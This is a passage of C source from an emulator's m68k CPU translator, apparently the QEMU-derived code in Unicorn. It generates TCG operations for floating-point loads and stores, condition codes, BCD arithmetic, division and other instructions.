OS_LONG: tcg_gen_qemu_ld32u(tcg_ctx, tmp, addr, index); gen_helper_exts32(tcg_ctx, tcg_ctx->cpu_env, fp, tmp); break; case OS_SINGLE: tcg_gen_qemu_ld32u(tcg_ctx, tmp, addr, index); gen_helper_extf32(tcg_ctx, tcg_ctx->cpu_env, fp, tmp); break; case OS_DOUBLE: tcg_gen_qemu_ld64(tcg_ctx, t64, addr, index); gen_helper_extf64(tcg_ctx, tcg_ctx->cpu_env, fp, t64); break; case OS_EXTENDED: if (m68k_feature(s->env, M68K_FEATURE_CF_FPU)) { gen_exception(s, s->base.pc_next, EXCP_FP_UNIMP); break; } tcg_gen_qemu_ld32u(tcg_ctx, tmp, addr, index); tcg_gen_shri_i32(tcg_ctx, tmp, tmp, 16); tcg_gen_st16_i32(tcg_ctx, tmp, fp, offsetof(FPReg, l.upper)); tcg_gen_addi_i32(tcg_ctx, tmp, addr, 4); tcg_gen_qemu_ld64(tcg_ctx, t64, tmp, index); tcg_gen_st_i64(tcg_ctx, t64, fp, offsetof(FPReg, l.lower)); break; case OS_PACKED: /* * unimplemented data type on 68040/ColdFire * FIXME if needed for another FPU */ gen_exception(s, s->base.pc_next, EXCP_FP_UNIMP); break; default: g_assert_not_reached(); } tcg_temp_free(tcg_ctx, tmp); tcg_temp_free_i64(tcg_ctx, t64); } static void gen_store_fp(DisasContext *s, int opsize, TCGv addr, TCGv_ptr fp, int index) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv tmp; TCGv_i64 t64; t64 = tcg_temp_new_i64(tcg_ctx); tmp = tcg_temp_new(tcg_ctx); switch (opsize) { case OS_BYTE: gen_helper_reds32(tcg_ctx, tmp, tcg_ctx->cpu_env, fp); tcg_gen_qemu_st8(tcg_ctx, tmp, addr, index); break; case OS_WORD: gen_helper_reds32(tcg_ctx, tmp, tcg_ctx->cpu_env, fp); tcg_gen_qemu_st16(tcg_ctx, tmp, addr, index); break; case OS_LONG: gen_helper_reds32(tcg_ctx, tmp, tcg_ctx->cpu_env, fp); tcg_gen_qemu_st32(tcg_ctx, tmp, addr, index); break; case OS_SINGLE: gen_helper_redf32(tcg_ctx, tmp, tcg_ctx->cpu_env, fp); tcg_gen_qemu_st32(tcg_ctx, tmp, addr, index); break; case OS_DOUBLE: gen_helper_redf64(tcg_ctx, t64, tcg_ctx->cpu_env, fp); tcg_gen_qemu_st64(tcg_ctx, t64, addr, index); break; case OS_EXTENDED: if (m68k_feature(s->env, M68K_FEATURE_CF_FPU)) { gen_exception(s, s->base.pc_next, EXCP_FP_UNIMP); break; } tcg_gen_ld16u_i32(tcg_ctx, tmp, fp, offsetof(FPReg, l.upper)); tcg_gen_shli_i32(tcg_ctx, tmp, tmp, 16); tcg_gen_qemu_st32(tcg_ctx, tmp, addr, index); tcg_gen_addi_i32(tcg_ctx, tmp, addr, 4); tcg_gen_ld_i64(tcg_ctx, t64, fp, offsetof(FPReg, l.lower)); tcg_gen_qemu_st64(tcg_ctx, t64, tmp, index); break; case OS_PACKED: /* * unimplemented data type on 68040/ColdFire * FIXME if needed for another FPU */ gen_exception(s, s->base.pc_next, EXCP_FP_UNIMP); break; default: g_assert_not_reached(); } tcg_temp_free(tcg_ctx, tmp); tcg_temp_free_i64(tcg_ctx, t64); } static void gen_ldst_fp(DisasContext *s, int opsize, TCGv addr, TCGv_ptr fp, ea_what what, int index) { if (what == EA_STORE) { gen_store_fp(s, opsize, addr, fp, index); } else { gen_load_fp(s, opsize, addr, fp, index); } } static int gen_ea_mode_fp(CPUM68KState *env, DisasContext *s, int mode, int reg0, int opsize, TCGv_ptr fp, ea_what what, int index) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg, addr, tmp; TCGv_i64 t64; switch (mode) { case 0: /* Data register direct. */ reg = tcg_ctx->cpu_dregs[reg0]; if (what == EA_STORE) { switch (opsize) { case OS_BYTE: case OS_WORD: case OS_LONG: gen_helper_reds32(tcg_ctx, reg, tcg_ctx->cpu_env, fp); break; case OS_SINGLE: gen_helper_redf32(tcg_ctx, reg, tcg_ctx->cpu_env, fp); break; default: g_assert_not_reached(); } } else { tmp = tcg_temp_new(tcg_ctx); switch (opsize) { case OS_BYTE: tcg_gen_ext8s_i32(tcg_ctx, tmp, reg); gen_helper_exts32(tcg_ctx, tcg_ctx->cpu_env, fp, tmp); break; case OS_WORD: tcg_gen_ext16s_i32(tcg_ctx, tmp, reg); gen_helper_exts32(tcg_ctx, tcg_ctx->cpu_env, fp, tmp); break; case OS_LONG: gen_helper_exts32(tcg_ctx, tcg_ctx->cpu_env, fp, reg); break; case OS_SINGLE: gen_helper_extf32(tcg_ctx, tcg_ctx->cpu_env, fp, reg); break; default: g_assert_not_reached(); } tcg_temp_free(tcg_ctx, tmp); } return 0; case 1: /* Address register direct. */ return -1; case 2: /* Indirect register */ addr = get_areg(s, reg0); gen_ldst_fp(s, opsize, addr, fp, what, index); return 0; case 3: /* Indirect postincrement. */ addr = tcg_ctx->cpu_aregs[reg0]; gen_ldst_fp(s, opsize, addr, fp, what, index); tcg_gen_addi_i32(tcg_ctx, addr, addr, opsize_bytes(opsize)); return 0; case 4: /* Indirect predecrememnt. */ addr = gen_lea_mode(env, s, mode, reg0, opsize); if (IS_NULL_QREG(addr)) { return -1; } gen_ldst_fp(s, opsize, addr, fp, what, index); tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_aregs[reg0], addr); return 0; case 5: /* Indirect displacement. */ case 6: /* Indirect index + displacement. */ do_indirect: addr = gen_lea_mode(env, s, mode, reg0, opsize); if (IS_NULL_QREG(addr)) { return -1; } gen_ldst_fp(s, opsize, addr, fp, what, index); return 0; case 7: /* Other */ switch (reg0) { case 0: /* Absolute short. */ case 1: /* Absolute long. */ case 2: /* pc displacement */ case 3: /* pc index+displacement. */ goto do_indirect; case 4: /* Immediate. */ if (what == EA_STORE) { return -1; } switch (opsize) { case OS_BYTE: tmp = tcg_const_i32(tcg_ctx, (int8_t)read_im8(env, s)); gen_helper_exts32(tcg_ctx, tcg_ctx->cpu_env, fp, tmp); tcg_temp_free(tcg_ctx, tmp); break; case OS_WORD: tmp = tcg_const_i32(tcg_ctx, (int16_t)read_im16(env, s)); gen_helper_exts32(tcg_ctx, tcg_ctx->cpu_env, fp, tmp); tcg_temp_free(tcg_ctx, tmp); break; case OS_LONG: tmp = tcg_const_i32(tcg_ctx, read_im32(env, s)); gen_helper_exts32(tcg_ctx, tcg_ctx->cpu_env, fp, tmp); tcg_temp_free(tcg_ctx, tmp); break; case OS_SINGLE: tmp = tcg_const_i32(tcg_ctx, read_im32(env, s)); gen_helper_extf32(tcg_ctx, tcg_ctx->cpu_env, fp, tmp); tcg_temp_free(tcg_ctx, tmp); break; case OS_DOUBLE: t64 = tcg_const_i64(tcg_ctx, read_im64(env, s)); gen_helper_extf64(tcg_ctx, tcg_ctx->cpu_env, fp, t64); tcg_temp_free_i64(tcg_ctx, t64); break; case OS_EXTENDED: if (m68k_feature(s->env, M68K_FEATURE_CF_FPU)) { gen_exception(s, s->base.pc_next, EXCP_FP_UNIMP); break; } tmp = tcg_const_i32(tcg_ctx, read_im32(env, s) >> 16); tcg_gen_st16_i32(tcg_ctx, tmp, fp, offsetof(FPReg, l.upper)); tcg_temp_free(tcg_ctx, tmp); t64 = tcg_const_i64(tcg_ctx, read_im64(env, s)); tcg_gen_st_i64(tcg_ctx, t64, fp, offsetof(FPReg, l.lower)); tcg_temp_free_i64(tcg_ctx, t64); break; case OS_PACKED: /* * unimplemented data type on 68040/ColdFire * FIXME if needed for another FPU */ gen_exception(s, s->base.pc_next, EXCP_FP_UNIMP); break; default: g_assert_not_reached(); } return 0; default: return -1; } } return -1; } static int gen_ea_fp(CPUM68KState *env, DisasContext *s, uint16_t insn, int opsize, TCGv_ptr fp, ea_what what, int index) { int mode = extract32(insn, 3, 3); int reg0 = REG(insn, 0); return gen_ea_mode_fp(env, s, mode, reg0, opsize, fp, what, index); } typedef struct { TCGCond tcond; bool g1; bool g2; TCGv v1; TCGv v2; } DisasCompare; static void gen_cc_cond(DisasCompare *c, DisasContext *s, int cond) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv tmp, tmp2; TCGCond tcond; CCOp op = s->cc_op; /* The CC_OP_CMP form can handle most normal comparisons directly. */ if (op == CC_OP_CMPB || op == CC_OP_CMPW || op == CC_OP_CMPL) { c->g1 = c->g2 = 1; c->v1 = QREG_CC_N; c->v2 = QREG_CC_V; switch (cond) { case 2: /* HI */ case 3: /* LS */ tcond = TCG_COND_LEU; goto done; case 4: /* CC */ case 5: /* CS */ tcond = TCG_COND_LTU; goto done; case 6: /* NE */ case 7: /* EQ */ tcond = TCG_COND_EQ; goto done; case 10: /* PL */ case 11: /* MI */ c->g1 = c->g2 = 0; c->v2 = tcg_const_i32(tcg_ctx, 0); c->v1 = tmp = tcg_temp_new(tcg_ctx); tcg_gen_sub_i32(tcg_ctx, tmp, QREG_CC_N, QREG_CC_V); gen_ext(tcg_ctx, tmp, tmp, op - CC_OP_CMPB, 1); /* fallthru */ case 12: /* GE */ case 13: /* LT */ tcond = TCG_COND_LT; goto done; case 14: /* GT */ case 15: /* LE */ tcond = TCG_COND_LE; goto done; } } c->g1 = 1; c->g2 = 0; c->v2 = tcg_const_i32(tcg_ctx, 0); switch (cond) { case 0: /* T */ case 1: /* F */ c->v1 = c->v2; tcond = TCG_COND_NEVER; goto done; case 14: /* GT (!(Z || (N ^ V))) */ case 15: /* LE (Z || (N ^ V)) */ /* * Logic operations clear V, which simplifies LE to (Z || N), * and since Z and N are co-located, this becomes a normal * comparison vs N. */ if (op == CC_OP_LOGIC) { c->v1 = QREG_CC_N; tcond = TCG_COND_LE; goto done; } break; case 12: /* GE (!(N ^ V)) */ case 13: /* LT (N ^ V) */ /* Logic operations clear V, which simplifies this to N. */ if (op != CC_OP_LOGIC) { break; } /* fallthru */ case 10: /* PL (!N) */ case 11: /* MI (N) */ /* Several cases represent N normally. */ if (op == CC_OP_ADDB || op == CC_OP_ADDW || op == CC_OP_ADDL || op == CC_OP_SUBB || op == CC_OP_SUBW || op == CC_OP_SUBL || op == CC_OP_LOGIC) { c->v1 = QREG_CC_N; tcond = TCG_COND_LT; goto done; } break; case 6: /* NE (!Z) */ case 7: /* EQ (Z) */ /* Some cases fold Z into N. */ if (op == CC_OP_ADDB || op == CC_OP_ADDW || op == CC_OP_ADDL || op == CC_OP_SUBB || op == CC_OP_SUBW || op == CC_OP_SUBL || op == CC_OP_LOGIC) { tcond = TCG_COND_EQ; c->v1 = QREG_CC_N; goto done; } break; case 4: /* CC (!C) */ case 5: /* CS (C) */ /* Some cases fold C into X. */ if (op == CC_OP_ADDB || op == CC_OP_ADDW || op == CC_OP_ADDL || op == CC_OP_SUBB || op == CC_OP_SUBW || op == CC_OP_SUBL) { tcond = TCG_COND_NE; c->v1 = QREG_CC_X; goto done; } /* fallthru */ case 8: /* VC (!V) */ case 9: /* VS (V) */ /* Logic operations clear V and C. */ if (op == CC_OP_LOGIC) { tcond = TCG_COND_NEVER; c->v1 = c->v2; goto done; } break; } /* Otherwise, flush flag state to CC_OP_FLAGS. */ gen_flush_flags(s); switch (cond) { case 0: /* T */ case 1: /* F */ default: /* Invalid, or handled above. */ abort(); case 2: /* HI (!C && !Z) -> !(C || Z)*/ case 3: /* LS (C || Z) */ c->v1 = tmp = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_setcond_i32(tcg_ctx, TCG_COND_EQ, tmp, QREG_CC_Z, c->v2); tcg_gen_or_i32(tcg_ctx, tmp, tmp, QREG_CC_C); tcond = TCG_COND_NE; break; case 4: /* CC (!C) */ case 5: /* CS (C) */ c->v1 = QREG_CC_C; tcond = TCG_COND_NE; break; case 6: /* NE (!Z) */ case 7: /* EQ (Z) */ c->v1 = QREG_CC_Z; tcond = TCG_COND_EQ; break; case 8: /* VC (!V) */ case 9: /* VS (V) */ c->v1 = QREG_CC_V; tcond = TCG_COND_LT; break; case 10: /* PL (!N) */ case 11: /* MI (N) */ c->v1 = QREG_CC_N; tcond = TCG_COND_LT; break; case 12: /* GE (!(N ^ V)) */ case 13: /* LT (N ^ V) */ c->v1 = tmp = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_xor_i32(tcg_ctx, tmp, QREG_CC_N, QREG_CC_V); tcond = TCG_COND_LT; break; case 14: /* GT (!(Z || (N ^ V))) */ case 15: /* LE (Z || (N ^ V)) */ c->v1 = tmp = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_setcond_i32(tcg_ctx, TCG_COND_EQ, tmp, QREG_CC_Z, c->v2); tcg_gen_neg_i32(tcg_ctx, tmp, tmp); tmp2 = tcg_temp_new(tcg_ctx); tcg_gen_xor_i32(tcg_ctx, tmp2, QREG_CC_N, QREG_CC_V); tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2); tcg_temp_free(tcg_ctx, tmp2); tcond = TCG_COND_LT; break; } done: if ((cond & 1) == 0) { tcond = tcg_invert_cond(tcond); } c->tcond = tcond; } static void free_cond(TCGContext *tcg_ctx, DisasCompare *c) { if (!c->g1) { tcg_temp_free(tcg_ctx, c->v1); } if (!c->g2) { tcg_temp_free(tcg_ctx, c->v2); } } static void gen_jmpcc(DisasContext *s, int cond, TCGLabel *l1) { TCGContext *tcg_ctx = s->uc->tcg_ctx; DisasCompare c; gen_cc_cond(&c, s, cond); update_cc_op(s); tcg_gen_brcond_i32(tcg_ctx, c.tcond, c.v1, c.v2, l1); free_cond(tcg_ctx, &c); } /* Force a TB lookup after an instruction that changes the CPU state. */ static void gen_exit_tb(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; update_cc_op(s); tcg_gen_movi_i32(tcg_ctx, QREG_PC, s->pc); s->base.is_jmp = DISAS_EXIT; } #define SRC_EA(env, result, opsize, op_sign, addrp) do { \ result = gen_ea(env, s, insn, opsize, tcg_ctx->NULL_QREG, addrp, \ op_sign ? EA_LOADS : EA_LOADU, IS_USER(s)); \ if (IS_NULL_QREG(result)) { \ gen_addr_fault(s); \ return; \ } \ } while (0) #define DEST_EA(env, insn, opsize, val, addrp) do { \ TCGv ea_result = gen_ea(env, s, insn, opsize, val, addrp, \ EA_STORE, IS_USER(s)); \ if (IS_NULL_QREG(ea_result)) { \ gen_addr_fault(s); \ return; \ } \ } while (0) static inline bool use_goto_tb(DisasContext *s, uint32_t dest) { return (s->base.pc_first & TARGET_PAGE_MASK) == (dest & TARGET_PAGE_MASK) || (s->base.pc_next & TARGET_PAGE_MASK) == (dest & TARGET_PAGE_MASK); } /* Generate a jump to an immediate address. */ static void gen_jmp_tb(DisasContext *s, int n, uint32_t dest) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (unlikely(s->base.singlestep_enabled)) { gen_exception(s, dest, EXCP_DEBUG); } else if (use_goto_tb(s, dest)) { tcg_gen_goto_tb(tcg_ctx, n); tcg_gen_movi_i32(tcg_ctx, QREG_PC, dest); tcg_gen_exit_tb(tcg_ctx, s->base.tb, n); } else { gen_jmp_im(s, dest); tcg_gen_exit_tb(tcg_ctx, NULL, 0); } s->base.is_jmp = DISAS_NORETURN; } DISAS_INSN(scc) { TCGContext *tcg_ctx = s->uc->tcg_ctx; DisasCompare c; int cond; TCGv tmp; cond = (insn >> 8) & 0xf; gen_cc_cond(&c, s, cond); tmp = tcg_temp_new(tcg_ctx); tcg_gen_setcond_i32(tcg_ctx, c.tcond, tmp, c.v1, c.v2); free_cond(tcg_ctx, &c); tcg_gen_neg_i32(tcg_ctx, tmp, tmp); DEST_EA(env, insn, OS_BYTE, tmp, NULL); tcg_temp_free(tcg_ctx, tmp); } DISAS_INSN(dbcc) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGLabel *l1; TCGv reg; TCGv tmp; int16_t offset; uint32_t base; reg = DREG(insn, 0); base = s->pc; offset = (int16_t)read_im16(env, s); l1 = gen_new_label(tcg_ctx); gen_jmpcc(s, (insn >> 8) & 0xf, l1); tmp = tcg_temp_new(tcg_ctx); tcg_gen_ext16s_i32(tcg_ctx, tmp, reg); tcg_gen_addi_i32(tcg_ctx, tmp, tmp, -1); gen_partset_reg(tcg_ctx, OS_WORD, reg, tmp); tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tmp, -1, l1); gen_jmp_tb(s, 1, base + offset); gen_set_label(tcg_ctx, l1); gen_jmp_tb(s, 0, s->pc); } DISAS_INSN(undef_mac) { gen_exception(s, s->base.pc_next, EXCP_LINEA); } DISAS_INSN(undef_fpu) { gen_exception(s, s->base.pc_next, EXCP_LINEF); } DISAS_INSN(undef) { /* * ??? This is both instructions that are as yet unimplemented * for the 680x0 series, as well as those that are implemented * but actually illegal for CPU32 or pre-68020. */ //qemu_log_mask(LOG_UNIMP, "Illegal instruction: %04x @ %08x\n", // insn, s->base.pc_next); gen_exception(s, s->base.pc_next, EXCP_ILLEGAL); } DISAS_INSN(mulw) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; TCGv tmp; TCGv src; int sign; sign = (insn & 0x100) != 0; reg = DREG(insn, 9); tmp = tcg_temp_new(tcg_ctx); if (sign) tcg_gen_ext16s_i32(tcg_ctx, tmp, reg); else tcg_gen_ext16u_i32(tcg_ctx, tmp, reg); SRC_EA(env, src, OS_WORD, sign, NULL); tcg_gen_mul_i32(tcg_ctx, tmp, tmp, src); tcg_gen_mov_i32(tcg_ctx, reg, tmp); gen_logic_cc(s, tmp, OS_LONG); tcg_temp_free(tcg_ctx, tmp); } DISAS_INSN(divw) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int sign; TCGv src; TCGv destr; /* divX.w <EA>,Dn 32/16 -> 16r:16q */ sign = (insn & 0x100) != 0; /* dest.l / src.w */ SRC_EA(env, src, OS_WORD, sign, NULL); destr = tcg_const_i32(tcg_ctx, REG(insn, 9)); if (sign) { gen_helper_divsw(tcg_ctx, tcg_ctx->cpu_env, destr, src); } else { gen_helper_divuw(tcg_ctx, tcg_ctx->cpu_env, destr, src); } tcg_temp_free(tcg_ctx, destr); set_cc_op(s, CC_OP_FLAGS); } DISAS_INSN(divl) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv num, reg, den; int sign; uint16_t ext; ext = read_im16(env, s); sign = (ext & 0x0800) != 0; if (ext & 0x400) { if (!m68k_feature(s->env, M68K_FEATURE_QUAD_MULDIV)) { gen_exception(s, s->base.pc_next, EXCP_ILLEGAL); return; } /* divX.l <EA>, Dr:Dq 64/32 -> 32r:32q */ SRC_EA(env, den, OS_LONG, 0, NULL); num = tcg_const_i32(tcg_ctx, REG(ext, 12)); reg = tcg_const_i32(tcg_ctx, REG(ext, 0)); if (sign) { gen_helper_divsll(tcg_ctx, tcg_ctx->cpu_env, num, reg, den); } else { gen_helper_divull(tcg_ctx, tcg_ctx->cpu_env, num, reg, den); } tcg_temp_free(tcg_ctx, reg); tcg_temp_free(tcg_ctx, num); set_cc_op(s, CC_OP_FLAGS); return; } /* divX.l <EA>, Dq 32/32 -> 32q */ /* divXl.l <EA>, Dr:Dq 32/32 -> 32r:32q */ SRC_EA(env, den, OS_LONG, 0, NULL); num = tcg_const_i32(tcg_ctx, REG(ext, 12)); reg = tcg_const_i32(tcg_ctx, REG(ext, 0)); if (sign) { gen_helper_divsl(tcg_ctx, tcg_ctx->cpu_env, num, reg, den); } else { gen_helper_divul(tcg_ctx, tcg_ctx->cpu_env, num, reg, den); } tcg_temp_free(tcg_ctx, reg); tcg_temp_free(tcg_ctx, num); set_cc_op(s, CC_OP_FLAGS); } static void bcd_add(TCGContext *tcg_ctx, TCGv dest, TCGv src) { TCGv t0, t1; /* * dest10 = dest10 + src10 + X * * t1 = src * t2 = t1 + 0x066 * t3 = t2 + dest + X * t4 = t2 ^ dest * t5 = t3 ^ t4 * t6 = ~t5 & 0x110 * t7 = (t6 >> 2) | (t6 >> 3) * return t3 - t7 */ /* * t1 = (src + 0x066) + dest + X * = result with some possible exceding 0x6 */ t0 = tcg_const_i32(tcg_ctx, 0x066); tcg_gen_add_i32(tcg_ctx, t0, t0, src); t1 = tcg_temp_new(tcg_ctx); tcg_gen_add_i32(tcg_ctx, t1, t0, dest); tcg_gen_add_i32(tcg_ctx, t1, t1, QREG_CC_X); /* we will remove exceding 0x6 where there is no carry */ /* * t0 = (src + 0x0066) ^ dest * = t1 without carries */ tcg_gen_xor_i32(tcg_ctx, t0, t0, dest); /* * extract the carries * t0 = t0 ^ t1 * = only the carries */ tcg_gen_xor_i32(tcg_ctx, t0, t0, t1); /* * generate 0x1 where there is no carry * and for each 0x10, generate a 0x6 */ tcg_gen_shri_i32(tcg_ctx, t0, t0, 3); tcg_gen_not_i32(tcg_ctx, t0, t0); tcg_gen_andi_i32(tcg_ctx, t0, t0, 0x22); tcg_gen_add_i32(tcg_ctx, dest, t0, t0); tcg_gen_add_i32(tcg_ctx, dest, dest, t0); tcg_temp_free(tcg_ctx, t0); /* * remove the exceding 0x6 * for digits that have not generated a carry */ tcg_gen_sub_i32(tcg_ctx, dest, t1, dest); tcg_temp_free(tcg_ctx, t1); } static void bcd_sub(TCGContext *tcg_ctx, TCGv dest, TCGv src) { TCGv t0, t1, t2; /* * dest10 = dest10 - src10 - X * = bcd_add(tcg_ctx, dest + 1 - X, 0x199 - src) */ /* t0 = 0x066 + (0x199 - src) */ t0 = tcg_temp_new(tcg_ctx); tcg_gen_subfi_i32(tcg_ctx, t0, 0x1ff, src); /* t1 = t0 + dest + 1 - X*/ t1 = tcg_temp_new(tcg_ctx); tcg_gen_add_i32(tcg_ctx, t1, t0, dest); tcg_gen_addi_i32(tcg_ctx, t1, t1, 1); tcg_gen_sub_i32(tcg_ctx, t1, t1, QREG_CC_X); /* t2 = t0 ^ dest */ t2 = tcg_temp_new(tcg_ctx); tcg_gen_xor_i32(tcg_ctx, t2, t0, dest); /* t0 = t1 ^ t2 */ tcg_gen_xor_i32(tcg_ctx, t0, t1, t2); /* * t2 = ~t0 & 0x110 * t0 = (t2 >> 2) | (t2 >> 3) * * to fit on 8bit operands, changed in: * * t2 = ~(t0 >> 3) & 0x22 * t0 = t2 + t2 * t0 = t0 + t2 */ tcg_gen_shri_i32(tcg_ctx, t2, t0, 3); tcg_gen_not_i32(tcg_ctx, t2, t2); tcg_gen_andi_i32(tcg_ctx, t2, t2, 0x22); tcg_gen_add_i32(tcg_ctx, t0, t2, t2); tcg_gen_add_i32(tcg_ctx, t0, t0, t2); tcg_temp_free(tcg_ctx, t2); /* return t1 - t0 */ tcg_gen_sub_i32(tcg_ctx, dest, t1, t0); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } static void bcd_flags(TCGContext *tcg_ctx, TCGv val) { tcg_gen_andi_i32(tcg_ctx, QREG_CC_C, val, 0x0ff); tcg_gen_or_i32(tcg_ctx, QREG_CC_Z, QREG_CC_Z, QREG_CC_C); tcg_gen_extract_i32(tcg_ctx, QREG_CC_C, val, 8, 1); tcg_gen_mov_i32(tcg_ctx, QREG_CC_X, QREG_CC_C); } DISAS_INSN(abcd_reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src; TCGv dest; gen_flush_flags(s); /* !Z is sticky */ src = gen_extend(s, DREG(insn, 0), OS_BYTE, 0); dest = gen_extend(s, DREG(insn, 9), OS_BYTE, 0); bcd_add(tcg_ctx, dest, src); gen_partset_reg(tcg_ctx, OS_BYTE, DREG(insn, 9), dest); bcd_flags(tcg_ctx, dest); } DISAS_INSN(abcd_mem) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src, dest, addr; gen_flush_flags(s); /* !Z is sticky */ /* Indirect pre-decrement load (mode 4) */ src = gen_ea_mode(env, s, 4, REG(insn, 0), OS_BYTE, tcg_ctx->NULL_QREG, NULL, EA_LOADU, IS_USER(s)); dest = gen_ea_mode(env, s, 4, REG(insn, 9), OS_BYTE, tcg_ctx->NULL_QREG, &addr, EA_LOADU, IS_USER(s)); bcd_add(tcg_ctx, dest, src); gen_ea_mode(env, s, 4, REG(insn, 9), OS_BYTE, dest, &addr, EA_STORE, IS_USER(s)); bcd_flags(tcg_ctx, dest); } DISAS_INSN(sbcd_reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src, dest; gen_flush_flags(s); /* !Z is sticky */ src = gen_extend(s, DREG(insn, 0), OS_BYTE, 0); dest = gen_extend(s, DREG(insn, 9), OS_BYTE, 0); bcd_sub(tcg_ctx, dest, src); gen_partset_reg(tcg_ctx, OS_BYTE, DREG(insn, 9), dest); bcd_flags(tcg_ctx, dest); } DISAS_INSN(sbcd_mem) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src, dest, addr; gen_flush_flags(s); /* !Z is sticky */ /* Indirect pre-decrement load (mode 4) */ src = gen_ea_mode(env, s, 4, REG(insn, 0), OS_BYTE, tcg_ctx->NULL_QREG, NULL, EA_LOADU, IS_USER(s)); dest = gen_ea_mode(env, s, 4, REG(insn, 9), OS_BYTE, tcg_ctx->NULL_QREG, &addr, EA_LOADU, IS_USER(s)); bcd_sub(tcg_ctx, dest, src); gen_ea_mode(env, s, 4, REG(insn, 9), OS_BYTE, dest, &addr, EA_STORE, IS_USER(s)); bcd_flags(tcg_ctx, dest); } DISAS_INSN(nbcd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src, dest; TCGv addr; gen_flush_flags(s); /* !Z is sticky */ SRC_EA(env, src, OS_BYTE, 0, &addr); dest = tcg_const_i32(tcg_ctx, 0); bcd_sub(tcg_ctx, dest, src); DEST_EA(env, insn, OS_BYTE, dest, &addr); bcd_flags(tcg_ctx, dest); tcg_temp_free(tcg_ctx, dest); } DISAS_INSN(addsub) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; TCGv dest; TCGv src; TCGv tmp; TCGv addr; int add; int opsize; add = (insn & 0x4000) != 0; opsize = insn_opsize(insn); reg = gen_extend(s, DREG(insn, 9), opsize, 1); dest = tcg_temp_new(tcg_ctx); if (insn & 0x100) { SRC_EA(env, tmp, opsize, 1, &addr); src = reg; } else { tmp = reg; SRC_EA(env, src, opsize, 1, NULL); } if (add) { tcg_gen_add_i32(tcg_ctx, dest, tmp, src); tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LTU, QREG_CC_X, dest, src); set_cc_op(s, CC_OP_ADDB + opsize); } else { tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LTU, QREG_CC_X, tmp, src); tcg_gen_sub_i32(tcg_ctx, dest, tmp, src); set_cc_op(s, CC_OP_SUBB + opsize); } gen_update_cc_add(tcg_ctx, dest, src, opsize); if (insn & 0x100) { DEST_EA(env, insn, opsize, dest, &addr); } else { gen_partset_reg(tcg_ctx, opsize, DREG(insn, 9), dest); } tcg_temp_free(tcg_ctx, dest); } /* Reverse the order of the bits in REG. */ DISAS_INSN(bitrev) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; reg = DREG(insn, 0); gen_helper_bitrev(tcg_ctx, reg, reg); } DISAS_INSN(bitop_reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opsize; int op; TCGv src1; TCGv src2; TCGv tmp; TCGv addr; TCGv dest; if ((insn & 0x38) != 0) opsize = OS_BYTE; else opsize = OS_LONG; op = (insn >> 6) & 3; SRC_EA(env, src1, opsize, 0, op ? &addr: NULL); gen_flush_flags(s); src2 = tcg_temp_new(tcg_ctx); if (opsize == OS_BYTE) tcg_gen_andi_i32(tcg_ctx, src2, DREG(insn, 9), 7); else tcg_gen_andi_i32(tcg_ctx, src2, DREG(insn, 9), 31); tmp = tcg_const_i32(tcg_ctx, 1); tcg_gen_shl_i32(tcg_ctx, tmp, tmp, src2); tcg_temp_free(tcg_ctx, src2); tcg_gen_and_i32(tcg_ctx, QREG_CC_Z, src1, tmp); dest = tcg_temp_new(tcg_ctx); switch (op) { case 1: /* bchg */ tcg_gen_xor_i32(tcg_ctx, dest, src1, tmp); break; case 2: /* bclr */ tcg_gen_andc_i32(tcg_ctx, dest, src1, tmp); break; case 3: /* bset */ tcg_gen_or_i32(tcg_ctx, dest, src1, tmp); break; default: /* btst */ break; } tcg_temp_free(tcg_ctx, tmp); if (op) { DEST_EA(env, insn, opsize, dest, &addr); } tcg_temp_free(tcg_ctx, dest); } DISAS_INSN(sats) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; reg = DREG(insn, 0); gen_flush_flags(s); gen_helper_sats(tcg_ctx, reg, reg, QREG_CC_V); gen_logic_cc(s, reg, OS_LONG); } static void gen_push(DisasContext *s, TCGv val) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv tmp; tmp = tcg_temp_new(tcg_ctx); tcg_gen_subi_i32(tcg_ctx, tmp, QREG_SP, 4); gen_store(s, OS_LONG, tmp, val, IS_USER(s)); tcg_gen_mov_i32(tcg_ctx, QREG_SP, tmp); tcg_temp_free(tcg_ctx, tmp); } static TCGv mreg(TCGContext *tcg_ctx, int reg) { if (reg < 8) { /* Dx */ return tcg_ctx->cpu_dregs[reg]; } /* Ax */ return tcg_ctx->cpu_aregs[reg & 7]; } DISAS_INSN(movem) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv addr, incr, tmp, r[16]; int is_load = (insn & 0x0400) != 0; int opsize = (insn & 0x40) != 0 ? OS_LONG : OS_WORD; uint16_t mask = read_im16(env, s); int mode = extract32(insn, 3, 3); int reg0 = REG(insn, 0); int i; tmp = tcg_ctx->cpu_aregs[reg0]; switch (mode) { case 0: /* data register direct */ case 1: /* addr register direct */ do_addr_fault: gen_addr_fault(s); return; case 2: /* indirect */ break; case 3: /* indirect post-increment */ if (!is_load) { /* post-increment is not allowed */ goto 